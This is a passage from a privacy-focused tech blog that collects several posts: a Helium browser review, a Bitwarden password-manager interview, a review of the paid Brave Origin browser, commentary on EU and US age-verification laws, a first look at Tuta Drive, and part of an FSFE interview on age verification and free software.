eyes open. The features that ship on by default and the pace of the rollout are things worth monitoring. Open source and good intentions are a strong foundation, but implementation matters, and it's still early. I'm also curious to see how the on-device model ecosystem develops. The more capable local models get, the more useful these features become without requiring privacy tradeoffs. Mozilla is in a good position to push that forward, and I hope they do. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), other [podcast apps](https://pod.link/1652151010), or [RSS](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) ## Episode Sources • Firefox: • Mozilla AI: • Mozilla Common Voice: ### Helium Browser Review: Is This Minimal, Privacy-Focused Chromium Browser Worth Switching To? URL: https://techlore.tech/helium-browser-review-a-truly-minimal-privacy-focused-chromium-browser/ Last updated: 2026-04-22T15:00:55.000Z ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-10.png) Helium Browser's homepage. If you've been searching for a minimal, privacy-respecting Chromium browser that doesn't come loaded with bloat, cryptocurrency features, or AI tools, [Helium Browser](https://helium.computer/) may have crossed your radar. Our community asked relentlessly, so it was time to test it head-to-head against Brave to give my honest take on whether it lives up to the hype, and who I think it's actually for. --- ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/Screenshot-2026-04-19-at-11.17.02-1.png) ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/Screenshot-2026-04-19-at-11.17.11-1.png) ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/Screenshot-2026-04-19-at-11.17.19-1.png) ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/Screenshot-2026-04-19-at-11.17.40-1.png) ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/Screenshot-2026-04-19-at-11.18.44.png) ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/Screenshot-2026-04-19-at-11.18.54.png) ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/Screenshot-2026-04-19-at-11.19.27.png) ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/Screenshot-2026-04-19-at-11.19.34.png) ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/Screenshot-2026-04-19-at-11.18.15.png) Just a few of the dozens of comments asking for an analysis of Helium browser. --- Helium is an open source Chromium-based browser developed by the team behind [imput](https://imput.net/). It's currently in beta on Windows, macOS & Linux. A few things stood out to me immediately during setup: - Helium notarizes their macOS app, which sounds like a small detail, but some browser forks [skip this step entirely](https://librewolf.net/docs/faq/#why-is-librewolf-marked-as-broken)—so I appreciated the proper notarization. - They proxy extension downloads from the Chrome Web Store so your data isn't handed directly to Google. That's a thoughtful privacy touch. - During setup, Helium lets you toggle which data categories you want to allow or disable, with a complete kill switch at the top for all of them. I enabled them all anyway, but I love this control nonetheless. - They also prompt you to choose a default search engine during setup. DuckDuckGo is a solid option, and I'd love to see Brave Search added too since that's my daily search engine. You can still add search engines in the settings later yourself. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/Timeline-1_0_0_0.gif) Helium setup process and the options available. Once I got in my first thought was that Helium felt *bare bones...*more on this later as it's not inherently a negative thing.uBlock Origin comes installed out of the box for strong privacy + adblocking, HTTPS Everywhere is enabled by default, and Memory Saver runs in balanced mode. Their [!bangs](https://helium.computer/bangs) are great, but I already use bangs through my search engine...so this isn't something I needed. Vertical tabs are a great feature. Extension support works well out of the box, and progressive web app installation works exactly as you'd expect from a Chromium-based browser. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-11.png) The default Helium browser UI after finishing the setup. Now here's where things get tricky, because there are some important things missing from Helium at the time of making this review: - **Browser syncing:** Helium runs on macOS, Windows, and Linux, but you can't sync on any of them. So if syncing matters to you, this is a dealbreaker. More on this in a second... - **No mobile apps:** There are no native Helium apps for mobile. And there are no native ways to sync from Helium to whichever mobile browser you use, even if they're Chromium-based. - **Translations:** Most modern browsers like Firefox andBrave have it. Helium doesn't. - **Widevine / DRM support:** From my testing, Helium doesn't appear to support Widevine, meaning streaming services with DRM content won't play back. Hopefully later they add support. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-12.png) Firefox browser sync explanation on its website. Now I want to talk about browser syncing for a second, because it's an under-discussed benefit of Firefox-based browsers. Generally, Chrome Sync runs on Google's private, closed infrastructure. Back in 2021, Google [locked down access to those APIs](https://blog.chromium.org/2021/01/limiting-private-api-availability-in.html) so only official Chrome builds can use them. That means any Chromium fork *(like Helium)* that wants to sync has to build it from scratch, which is an enormous task. Brave & other mainstream Chromium-based browsers tend to [engineer](https://support.brave.app/hc/en-us/articles/360021218111-How-do-I-set-up-Sync) their own solution. But many others *(like Helium)* do not. Firefox is a completely different story because Mozilla built Firefox Sync on an [open protocol with a fully open-source server](https://mozilla-services.github.io/syncstorage-rs/). Mozilla even lets you [self-host the entire sync server](https://github.com/mozilla-services/syncstorage-rs). This enables you to freely mix & match Firefox-based browser forks without needing each one to commit to every operating system—all with the same Mozilla account between them to sync bookmarks, logins, tabs, and history. This doesn't make Helium *(Chromium-based)* a bad browser. But it is a reminder that Chromium's relationship with Google is baked very deep. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-15-1.png) ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-16-1.png) Side-by-side results between Helium (left) and Brave (right) on Speedometer and Cover Your Tracks. Some other important side-by-side tests: - **Performance:** I ran some side-by-side comparisons with Brave on our [PeerTube server](https://techlore.tv/) and with Speedometer, and they perform similarly. CPU and memory usage was also quite similar. I'd call this mostly even for everyday use. - **Privacy**: Using Cover Your Tracks and browser leak tests, both Helium and Brave blocked tracking ads and invisible trackers. The notable difference: Brave flagged a *randomized* fingerprint, while Helium's canvas protection behavior was inconsistent in my testing—possibly a quirk with the testing tool rather than a Helium flaw, but worth noting. Don't forget that both are meaningfully better than Chrome out of the box. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-19-1.png) Helium (left) new tab page vs Brave Origin (right) new tab page. Where things get more interesting is design, and I'll be direct about my preferences here. I'm not a fan of Helium's UI. To me, stripping everything down isn't the same as good design, and I think that distinction matters. Compared to a de-bloated Brave with nice padding, breathing room in the tab bar, better scaling, and wallpapers that make the new tab page feel more welcoming—Helium feels barebones to a fault. With that said, if you want maximum web content and minimum browser interface, Helium delivers that. It chases a raw experience, and I'm sure that connects with some people—just not me. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-20.png) Imput.net's homepage—the creators of Helium Browser. My final concern is sustainability, which cuts both ways. Brave is a large, established company; I'm confident it exists in five years. Helium is run by two people, still in beta, and has no clear business model that I'm able to find, so it still needs to pass the test of time. But that same small team has shipped something with zero baggage: no cryptocurrency controversy, no AI products, no eyebrow-raising decisions. If that matters to you, you should consider [supporting them](https://helium.computer/sponsor)! **My final take:** Helium's tagline is "internet without interruptions"—and the interruptions apply to Helium itself too. It doesn't interrupt you with features, cryptocurrency, AI, or anything else. That's exactly who it's for right now: someone who doesn't need sync, doesn't need DRM playback, and just wants something that does the basics without the nonsense. I won't be using Helium as I haven't figured out where it fits in my workflow, but I don't have a strong reason **not** to use it. I'll re-assess as they continue development to see if someday it makes more sense for me. **One use case worth flagging:** Helium makes a strong dedicated home for progressive web apps. PWA support is native on Chromium, compatibility is excellent, and uBlock Origin runs by default inside them so you get ad and tracker blocking without any extra setup for your apps. Some people may also appreciate their native `!bangs` feature. **In summary:** Go in expecting something that works, does the basics, stays out of your way, and has a clean track record. On those terms, Helium delivers. If you want to learn more about Helium, see videos of it in action, and get more personal thoughts & analysis—we just published a review of Helium on our YouTube channel: [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Password Manager Security Explained: Argon2, PBKDF2, and Open Source with Bitwarden URL: https://techlore.tech/password-manager-security-explained-with-bitwarden/ Last updated: 2026-04-21T17:29:47.000Z I've been [recommending](https://essentials.techlore.tech/#password-managers) Bitwarden for years and it's one of our community's favorites! People discuss it so frequently that I sometimes forget I've never actually sat down with the team, so this interview was long overdue. Ryan Luibrand from Bitwarden's product team joined me on Techlore Talks, covering everything from the origins of the project, to the security architecture and more. While I don't personally use Bitwarden, I was still very excited to learn more about it! --- **Open source isn't just a philosophy, it's a security argument** One of the first things I wanted to establish for anyone newer to the space: what does being open source actually *mean* for a password manager? > Ryan: *"What would you trust more? Somebody who's like, oh, trust us, we're good. Or another company that says, you don't have to trust us. Here's how everything works."* What Ryan is referring to here is the concept of security through obscurity where companies rely on the *secrecy* of their product rather than *technically sound, open security*. With Bitwarden, the code is on [GitHub](https://github.com/bitwarden). Anyone can look. And with that kind of scrutiny, vulnerabilities get found and fixed fast. This is why a majority of services in our[ SPA Essentials](https://essentials.techlore.tech/) are open source. --- **The encryption rabbit hole (we went all the way down)** I asked about zero-knowledge encryption and the cloud concern, because it's a tough pill to swallow when I say out loud in a video "I'm storing my passwords on someone else's computer." Ryan walked through the full picture: your vault is encrypted *on your device* before it ever leaves, and what sits on Bitwarden's servers is useless without your master password. > Ryan: *"Even if there were some sort of cloud breach and somebody grabbed the entire Bitwarden server blob — there's nothing there for them."* But your master password isn't even the actual key to your vault. It gets run through a key derivation function (KDF)—by default 600,000 iterations of PBKDF2, or Argon2 for those who opt in. That makes brute-force attacks computationally difficult. Your vault is then wrapped in additional layers of encryption on the server side with keys stored separately. This isn't an encryption deep-dive, so I recommend listening to the interview for Ryan's breakdown. --- **The TOTP question I always get asked** A question I get *all the time* from our community is if they should store their 6-digit TOTP codes inside their password manager, or keep them separate. While those with higher threat models can certainly opt for the latter for extra security, having *any* 2FA in any context is where you'll get a majority of gains. I also shared a hybrid approach in the interview: high-security accounts (email, banking) stay in a dedicated TOTP app. Lower-stakes stuff lives in a password manager for convenience. Ryan validated this framing as not an all-or-nothing choice, and the right answer depends on your threat model and how you actually use the tool. The bigger point: having *any* 2FA, stored anywhere reasonable, already protects you against credential stuffing—the most common real-world attack. The paranoid scenario of "what if someone gets into my password manager" is a much higher bar to clear than the everyday reality of leaked username/password combos getting tested across the internet automatically. --- **A question nobody asks: what happens when you die?** Ryan brought up something that doesn't get nearly enough coverage: emergency access planning. He shared that he keeps a handwritten copy of his critical credentials in a physical safe at home. > Ryan: *"Security is about keeping good people in and bad people out. It's not about keeping everyone out, period."* I've thought about this more since a family member passed recently, and other family members really struggled to gain access their accounts—making an already challenging time even more difficult. Death is never fun to think about, but it's an important consideration. A lot of security advice online when taken in absolutes doesn't actually allow the proper people to have access to your data—it keeps everyone out in a blanket manner. I would argue *proper* security involves keeping the right people in, and the wrong people out. --- **My takeaways** Bitwarden has earned its reputation. The open source commitment is real, the security architecture is sound, and the free plan gives most people everything they actually need. Ryan's final message was pretty simple: > Ryan: "use any password manager. Just use one. The security improvement over reused passwords is enormous regardless of which tool you pick." If you're going to pick one—and especially if you care about open source and transparency—Bitwarden makes a compelling case for itself. I'm still a huge fan of Proton Pass (I love its UI/UX and SimpleLogin integration!) so that's what I'm using, but it's nice to know Bitwarden will continue to be a strong recommendation to our audience amongst many. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), or any [podcast app](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) # Episode Sources - Bitwarden: - Privacy Policy: - Compliance & Audit Reports: - Security White Paper: - Security Readiness Kit: - HackerOne Bug Bounty: - GitHub: ### Brave Origin Review: Is the New $60 Paid Browser Worth It? URL: https://techlore.tech/brave-origin-review-is-the-new-60-paid-browser-worth-it/ Last updated: 2026-04-18T18:56:22.000Z One of our most [popular videos ever](https://youtu.be/W6cKFliWW6Q) showed how to strip Brave down to its bare bones for free—effectively 'debloating' it. Brave noticed that demand from their users and launched [Brave Origin Nightly](https://brave.com/origin/download-nightly/), a $60 one-time purchase that does it for you straight from the source code. Brave Shields, strong privacy, strong security, no bloat. So the obvious question: is this legitimate, or are they charging you to undo their own choices? ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-5.png) While Origin is currently only in Brave Nightly, it'll be available as a stable release soon. Here's what Brave Origin removes by default according to their [support article](https://support.brave.app/hc/en-us/articles/38561489788173-What-is-Brave-Origin): - Leo - News - Playlist on iOS - Rewards (disables Brave Ads) - Speedreader - Telemetry - Talk - Tor - VPN - Wallet - Web3 domains - Wayback Machine - Web Discovery Project ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-6.png) Left window is Brave Nightly with Brave Origin Toggles. Right window is the native Brave Origin Nightly with no toggles. That's a significant list, but *how* those features are removed depends on which version you use: 1. The first method is the dedicated, standalone Brave Origin browser. This is its own package with the features compiled out of the build entirely. This is great for purists who want the code removed completely, but you can't manually enable any features. 2. The second method is a paid upgrade inside the standard Brave Browser. This will deliver the same Origin experience, *but* you gain the option to re-enable individual toggles for each feature in *Settings > Brave Origin*. In my opinion, most people should use this method as it offers more flexibility. It's important to mention you can use *both* on the same system like I showed in the screenshot above. This presents a fascinating new workflow where you can someday have two stable instances of Brave on your machine—one is automatically 'mostly clean' and one is automatically 'completely clean'—and you can utilize them for different use-cases. The license works with up to 10 browsers, so it's quite flexible. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-8.png) The welcome setup screen for Brave Origin From a privacy angle, I have to give Brave credit here: they implement [Privacy Pass blind token technology](https://github.com/brave/brave-core/blob/master/docs/premium%5Faccount%5Fprivacy.md) so the $60 purchase isn't tied to any specific browser. The browser just knows yes or no that you paid. Nice touch. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-4.png) Overview of their Privacy Pass tech from GitHub My honest take after testing it? I'll almost never recommend the standalone app for most users by itself. Too many things are gone: Speed Reader, Tor windows, Wayback Machine. These are actually useful! I think the smarter path is upgrading to Origin within Brave, where those features are still accessible if you want some of them back. Perhaps there are environments like schools or companies where the standalone version would make more sense. Now there's one *massive* win here that Brave is underselling...this is completely free on Linux. So if you're using Brave on Linux, you'll get access to Brave Origin as both an "upgrade" inside regular Brave, or the standalone app. This is huge! ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-3.png) Chart from Brave's Support Page And now the cost....I can't say I mind it. Every browser has to make money somehow. Chrome does it through your data. Firefox survives largely on Google's search deal. Forks of Firefox survive indirectly through Firefox footing that bill by maintaining nearly the entire codebase. I've spoken (and met!) Firefox & Brave engineers—and I can tell you they're brilliant and certainly couldn't work on these projects full time if they were free. Brave has been trying to build their own revenue stream through its VPN, cryptocurrency, and other things many of us found frustrating to navigate. What Brave Origin does for the first time is shift the incentive. You're a paying user again—not a data point, not an attention metric, not someone they're hoping sticks with the default Google search or someone who uses cryptocurrency. It's a direct relationship between you and the company building your browser. Browsers used to be paid software, and I'd argue their priorities reflected that. Free browsers have brought internet access to billions of people and that matters—but free isn't actually free, and Brave Origin is our first, modern example of what a premium browser looks like with a complete dedication to the user. If you're on Linux, this is a no-brainer—it's completely free. For everyone else, I can't say I'm mad the option exists. Regular Brave hasn't changed, [our tutorial still debloats it for free](https://youtu.be/W6cKFliWW6Q), and we now have a genuine user-first browser option I didn't think we'd see in 2026\. Of course, the last reason to consider this is if you just want to support Brave developers. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-9.png) Logos of Brave Nightly, Brave Origin Nightly, and Brave Browser If you're wondering what I'll be doing: Brave is already my default browser on my devices, with Mullvad Browser/Tor Browser/Firefox for other use-cases. [(Visit our SPA Essentials to learn more about these!)](https://essentials.techlore.tech/#web-browsers) Since I had to pay to test out Brave Origin for this review, I suppose I'll be using it from here on out once it's in the stable release and it will save me time from debloating future devices. I plan to go with the 'upgrade' path—and down the road I'll explore the dedicated package to see if it fits in any part of my workflow. **(I love that new Origin icon!)** I covered more of my thoughts in a dedicated deep-dive on YouTube & PeerTube: **Edit**: Important correction on the 10 licenses I learned after the review: I said "10 devices" but it's actually 10 activations...not 10 simultaneously active devices. That's a real difference I think is worth calling out. I already burned 2 activations just making this review. If you reinstall, switch machines, or test it like I did, those activations disappear. For $60, I'd expect this to be done by total active devices (like most professional software!) and I hope Brave reconsiders this before stable release. **Second edit:** Good update—found [this](https://www.reddit.com/r/browsers/comments/1snal1p/comment/ogm9dfq/ ) post from a team-member that clarifies: "We're going to add controls before this hits Release channel on account.brave.com to be able to self-extend the number of activations so you don't need to reach out to support to do it." so hopefully that makes the activations less of an issue! [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### EU and US Age Verification Explained: What the 'Parent's Decide Act' and EU Apps Actually Mean for Privacy & Freedom URL: https://techlore.tech/eu-and-us-age-verification-explained-what-the-new-laws-and-apps-actually-mean-for-your-privacy-free/ Last updated: 2026-04-23T23:36:00.000Z This week two major governments made significant moves on age verification, and the contrast between them tells you everything about where this is headed globally. The US introduced [HR 8250](https://www.congress.gov/bill/119th-congress/house-bill/8250/all-info), the "Parents Decide Act," a bipartisan federal bill that would require operating system providers to verify user age at device setup and pipe that signal to every app via an API. No bill text has been published yet, which means we don't know the exact verification mechanism...but based on California's AB 1043, which this mirrors, your OS would essentially become a persistent identity signal broker that every app on your device can query. We'll be doing coverage once we see more details of the bill. The EU took a more technically sophisticated approach. Their new age verification app, announced April 15th as "technically ready" uses zero-knowledge proofs to help ensure identity via cryptography. You scan your passport, your phone generates about 30 single-use anonymous credentials, and sites only receive a yes or no on your age. In theory, nothing else leaves your device. It's [open source on GitHub](https://github.com/eu-digital-identity-wallet/av-app-android-wallet-ui), which I genuinely respect and that's real transparency. But a [recent security audit](https://docs.yivi.app/blog/eu-age-verification-security-analysis/) found a fundamental architectural flaw where the issuer server has no way to verify the passport scan actually happened on your device. There's a *possibility* that gap may require sending your document data to a server, which breaks the privacy promise, but this is still an unfolding problem. And separately, the app currently requires [Google's Play Integrity API on Android](https://github.com/eu-digital-identity-wallet/eudi-app-android-wallet-ui/issues/287), effectively locking out Android open source ROMs—ironic for an initiative that's supposed to represent European digital sovereignty. My **short-term** **concern** is much higher for the US than the EU. The EU at least has GDPR, a cryptographic foundation, and public code you can audit. The US has none of those floors—no federal privacy law, an unknown verification mechanism, and a bill written broad enough that its title technically covers Linux distributions. *(we shall see if that's the case)* That combination worries me. However, my **long-term concern** is the same for both. Neither of these approaches addresses what happens after the gate. You verify a 13-year-old is 13, a parent clicks okay, and they're sent directly into the same algorithmically optimized, addictive environment that was apparently the problem in the first place. Nothing about the actual harm changes. This is why companies like Meta are [lobbying hard for these laws](https://www.yahoo.com/news/articles/reddit-user-uncovers-behind-meta-154717384.html)—once a parent says it's fine, the liability shifts entirely and the platforms don't have to change a thing. [A jury just confirmed on March 25th](https://www.nytimes.com/2026/03/25/technology/social-media-trial-verdict.html) that Meta and YouTube deliberately designed their platforms to be addictive. We're fining them and moving on and trying to slap a generic 'verification' and calling it a day hoping that somehow kids will be safer. If you're in the US, I encourage you all to [contact your representatives](https://www.house.gov/representatives/find-your-representative) now! We're still in step one of five on this bill, which is the window where pressure can make a huge impact. Those in the EU should do the same, and please follow amazing organizations like the [EFF](https://www.eff.org/), [EDRi](https://edri.org/), and [FSFE](https://fsfe.org/index.en.html) who are doing a lot to fight for the right side of things! I did a lot more coverage with more personal analysis in our latest video on YouTube and PeerTube below: [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Tuta Drive First Look: The Encrypted Platform That Does What Google and Apple Won't URL: https://techlore.tech/tuta-drive-first-look-the-encrypted-platform-that-does-what-google-and-apple-wont/ Last updated: 2026-04-16T14:52:05.000Z ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-1.png) Tuta [just launched](https://tuta.com/blog/tuta-drive-in-beta-launch) their new [cloud storage product](https://tuta.com/drive) in closed beta which I got access to, and I think the timing matters more than the feature list. To start, it's worth reflecting on how most big tech companies handle this: - Apple's Advanced Data Protection is impressive, but there are specific carve-outs: [email, contacts, and calendar](https://support.apple.com/guide/security/advanced-data-protection-for-icloud-sec973254c5f/web) that aren't covered, which means Apple can theoretically access that data. Services like Proton & Tuta are perfect drop-ins in this scenario. - Google [tries](https://workspace.google.com/blog/identity-and-security/gmail-easy-end-to-end-encryption-all-businesses). - Microsoft doesn't even pretend to try. Put simply, these are trillion-dollar companies, and none of them have built a full workspace where they genuinely can't read your stuff—a standard I think more businesses (and individuals!) should hold themselves to. Proton has been closing that gap for a while, even recently rebranding to [Proton Workspace](https://proton.me/business/blog/proton-workspace) on business plans. And now, we have Tuta closing a final loop on their end to include email, calendar, contacts, and **drive.** All zero-knowledge with end-to-end encryption. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/Screenshot-2026-04-15-at-22.28.22-1.png) The product itself is bare bones right now...this feels like a true first product. It's browser-only for now, there's no file sharing yet, few integrations with the rest of the suite, and upload speeds with large videos were a bit slow in my testing. But what's there works, and the encryption underneath it is legitimately interesting: it uses the same [post-quantum ](https://tuta.com/blog/pqdrive-project)protocol from Tuta, which means it's designed to resist the "harvest now, decrypt later" threat that's become a real concern for stored data. But stepping back from the feature list for a second, I think it's worth being grateful for the competition. iCloud didn't always have Advanced Data Protection. Google only recently rolled out end-to-end encryption for mobile Gmail on Workspace. I'm genuinely not sure if either of those things would've happened without privacy-first services like Proton & Tuta pushing the industry for years. Competition from privacy-first companies creates pressure that eventually moves even trillion-dollar platforms. More options, more pressure, better outcomes for everyone. That's the ecosystem story here, and I think that's bigger than whether Tuta Drive is ready to replace your current setup today. It's the same dynamic we see with Linux on the desktop...its mere existence keeps Windows and macOS more open than they'd likely otherwise be. When that kind of credible alternative is absent, like on iOS and Android where no real open competitor exists, you see [exactly what these platforms do ](https://keepandroidopen.org/)with unchecked control. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-2.png) **Who should try it now?** If you're already in the Tuta ecosystem and want to consolidate everything under one zero-knowledge roof, it's worth jumping into the launch and helping shape the product. Additionally, if you're a cryptography nerd...there seems to be some seriously cool tech happening here. **Who should wait?** If you're not already a Tuta user, I think Proton Drive is significantly more mature. It has desktop clients, file sharing, and a more complete feature set at the time of writing. But competition in this space is good. Proton Drive was actually very similar when it first launched. If Tuta follows the same trajectory, we could end up with two genuinely strong private workspace options—and I think that's a win for everyone. I'd love to hear any of your questions, I'll be following Tuta Drive's progress closely and will keep you updated as this develops! [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Age Verification Laws and Free Software: A Legal Expert Tells Us What's Actually at Stake URL: https://techlore.tech/age-verification-laws-and-free-software-fsfe-interview-techlore-talks/ Last updated: 2026-04-14T17:08:32.000Z [Audio episode embed, click here to watch the full video episode.](https://youtu.be/5iKvQk7drd4) I walked into this interview more nervous than usual. Age verification is one of those topics where I've had strong reactions, but haven't been able to fully communicate them. It's also inherently a charged topic given it involves child safety, and every time I try to make sense of what's actually happening...the [systemD birthdate field](https://www.theregister.com/2026/03/24/foss%5Fage%5Fverification/), [MidnightBSD banning California users](https://ostechnix.com/midnightbsd-excludes-california-digital-age-assurance-act/), [Apple rolling out age checks in the UK](https://gizmodo.com/apple-requires-device-level-age-verification-in-the-uk-now-could-the-us-be-next-2000738481)...I end up with more questions than answers. [Jithendra Palepu](https://www.linkedin.com/in/jithendra-palepu-9a6404103/) has a legal background and works in tech law, policy, and open source governance with the [FSFE](https://fsfe.org). He's been deep in this fight [so I brought him on Techlore Talks](https://youtu.be/5iKvQk7drd4) to discuss the questions I *(and many of you!)* had to try and add more clarity around these discussions. --- **The terminology problem is bigger than you think** Before we could even talk about whether these laws are good or bad, Jithendra made me slow down on the vocabulary. There are four distinct things that often get lumped under "age verification"—and they're not the same: - **Age verification:** actual government ID or biometric checks. "Show me your papers." - **Age estimation:** an algorithm guesses your age based on data signals. - **Age gating:** a hard ban: below this age, you cannot proceed at all. - **Self-declaration (or self-attestation):** the classic "are you 18?" checkbox we've all clicked since the early internet based on a trust system. This distinction matters. Jithendra outlines how a lot of the panic in the free software community has been treating every law as if it's demanding government ID checks, and so he consistently reiterated throughout the interview to try and properly appreciate the spectrum of concerns. --- **Me: California's law—is it actually as bad as people are saying?** > **Jithendra:** "In the context of the California bill, it's only asking for self-declaration. So they're not verifying anything of that sort. I would not call that age verification per se." --- **Me: What about the slippery slope? Self-declaration today, ID checks tomorrow?** > **Jithendra:** "We should basically ensure that these things don't go beyond that. We don't need age assurance technology. We don't need some third party verifying somebody's IDs...we've seen how badly they fail in practice. And they enable all kinds of malpractices." His position isn't "don't worry about it." It's "fight the right battle at the right time." Third-party biometric identity verification absolutely **is** the right battle and it's already happening in many regions around the world. So it's important we direct our outrage towards the correct problems. --- **The MidnightBSD situation is a real problem—just not for the reason people think** [MidnightBSD recently changed its license](https://ostechnix.com/midnightbsd-excludes-california-digital-age-assurance-act/) to block users from California. The intention was to push back against age verification laws. But Jithendra pointed out that this move actually violates one of the core principles of free and open source software: *no discrimination against any section of users.* > **Jithendra:** "When the definition says that there should not be any discrimination on certain sections of society in the use of the software—the license change that we saw was that users from California are not allowed to use the software. These are the things we should be really mindful of, because these are core principles of free and open source software." In other words: the reaction to protect software freedom ended up *undermining* software freedom. That's the trap Jithendra is warning about. --- **The UK is where things get genuinely scary** The slippery slope isn't hypothetical. In the UK, it's already being proposed. The UK isn't messing around with checkboxes. They're implementing real age verification—and now they want to [extend it to VPNs,](https://www.pcmag.com/news/vpns-are-supposed-to-protect-your-privacy-will-the-uk-govt-destroy-that) which is a meaningful escalation. Jithendra was candid: he doesn't know how UK-style enforcement is even technically possible. *"I'm not sure how this can be enforced per se."* But the intent is there, and that intent matters. --- **Would OS-Level Age Verification Even Be Legal Under GDPR?** A [Techlorian](https://techlore.tech/support/#/portal/signup) asked a good question: would OS-level age verification even be legal in the EU under GDPR—a framework that treats even IP addresses as personal data? Jithendra's answer was careful... > **Jithendra:** "We need to assess it on a case-by-case basis. I cannot really say on a general basis that it's compliant. But I would be on the side that on the face of it, it looks like it will not be compliant if the data is going somewhere else or if it's saved somewhere else. Even an IP address is considered personal data under GDPR." He also pointed out that Europe's Digital Services Act, its primary tool for platform regulation, explicitly targets only very large online platforms (VLOPs) above certain user and revenue thresholds. A smaller free software project wouldn't even be in scope. But broader OS-level laws are being discussed, and that's where things get murkier. The liability question is equally unresolved. When a [Techlorian](https://techlore.tech/support/#/portal/signup) asked who's legally responsible when the data inevitably leaks—the government, the platform, or the third-party verifier—Jithendra's answer was blunt: *"It seems like it's distributed liability."* In other words, nobody has cleanly accepted the responsibility that comes with demanding your identity. --- **The People Nobody's Thinking About: Young Developers** One of the most important questions of the whole interview came from a [Techlorian](https://techlore.tech/support/#/portal/signup): is age verification directly threatening software freedom and programming education for minors? > **Jithendra:** "Kids and children — minors — should not be banned from participating in democratic society and should not be banned from their own curiosity." He brought up the [FSFE's Youth Hacking for Freedom program](https://fsfe.org/activities/yh4f/), where teenagers participate in hacking competitions and build real projects. Blanket age restrictions don't just limit what kids can consume, they limit what they can *create*. The next generation of open source contributors, distro maintainers, and digital rights advocates are often teenagers tinkering around on the edges of technology. > **Jithendra:** "There will be impacts if there is a blanket ban. First of all, they are not really enforceable. Second of all, they are really detrimental to the very core of the right to tinker and right to repair — and just basic curiosity of a child or a teenager." I don't think this angle gets nearly enough coverage in the age verification debate. Every conversation centers on protecting kids *from* the internet. Almost no one asks what we lose when we cut kids *off* from it. --- **Google Compared ID Checks to Airport Security. It Didn't Land Well.** One moment in the interview I didn't expect...Jithendra brought up how much of this is similar to Google rolling out [government ID checks for developers](https://cybernews.com/tech/google-android-developer-verify-identity-lose-sideloading/), which hit F-Droid particularly hard and sparked the [Keep Android Open campaign](https://keepandroidopen.org/). Just like Google wants to keep people 'safer'—it's causing an immense amount of damage to the free software movement along the way. Google's public response to criticism? They said that developers should think of it like showing ID at an airport. > **Jithendra:** "They're even telling you which kind of analogy you should understand this issue in. It's quite bad." I found this quite out of touch given the current US political climate around airports and immigration enforcement. It's a small moment, but it illustrates something bigger: tech companies are increasingly comfortable framing surveillance infrastructure as routine inconvenience. The normalization happens in the language before it happens in the law, and there are many parallels to age 